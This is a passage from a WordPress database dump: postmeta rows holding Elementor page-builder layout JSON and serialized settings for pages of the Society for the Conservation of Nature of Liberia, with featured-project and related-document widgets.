Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53f2292\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1eff497\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f481ee\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:scnl\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27413,3983,'_thumbnail_id','2770'),(27414,3983,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27415,2769,'internet','https://scnlliberia.org/'),(27416,2769,'_pods_institution_logo','a:1:{i:0;i:2781;}'),(27417,2769,'institution_logo','2781'),(27418,2965,'_last_editor_used_jetpack','classic-editor'),(27419,3984,'_elementor_edit_mode','builder'),(27420,3984,'_elementor_template_type','wp-post'),(27421,3984,'_elementor_version','2.7.5'),(27422,3984,'_wp_page_template','default'),(27423,3984,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Society for the Conservation of Nature of Liberia (SCNL) is Liberia\\u2019s oldest conservation organization. We are a not-for-profit and non-governmental organization. We promote the conservation and wise use of Liberia\\u2019s natural resources to ensure a healthy environment and good quality life for all people in Liberia.<\\/p><p>SCNL works to educate, encourage and assist the public to understand the need to conserve nature, build consensus on the effective management of biodiversity, and to ensure that the use of natural resources is sustainable.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"scnl\\\",\\\"tag_id\\\":\\\"210\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"scnl\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53f2292\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1eff497\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f481ee\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:scnl\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27424,3984,'_thumbnail_id','3223'),(27425,3984,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27426,3985,'_elementor_edit_mode','builder'),(27427,3985,'_elementor_template_type','wp-post'),(27428,3985,'_elementor_version','2.7.5'),(27429,3985,'_wp_page_template','default'),(27430,3985,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Society for the Conservation of Nature of Liberia (SCNL) is Liberia\\u2019s oldest conservation organization. We are a not-for-profit and non-governmental organization. We promote the conservation and wise use of Liberia\\u2019s natural resources to ensure a healthy environment and good quality life for all people in Liberia.<\\/p><p>SCNL works to educate, encourage and assist the public to understand the need to conserve nature, build consensus on the effective management of biodiversity, and to ensure that the use of natural resources is sustainable.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"scnl\\\",\\\"tag_id\\\":\\\"210\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"scnl\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53f2292\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1eff497\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f481ee\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:scnl\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27431,3985,'_thumbnail_id','3223'),(27432,3985,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27433,2965,'internet','https://www.giz.de/en/worldwide/325.html'),(27434,2965,'_pods_institution_logo','a:1:{i:0;i:2963;}'),(27435,2965,'institution_logo','2963'),(27436,3986,'_elementor_edit_mode','builder'),(27437,3986,'_elementor_template_type','wp-post'),(27438,3986,'_elementor_version','2.7.5'),(27439,3986,'_wp_page_template','default'),(27440,3986,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"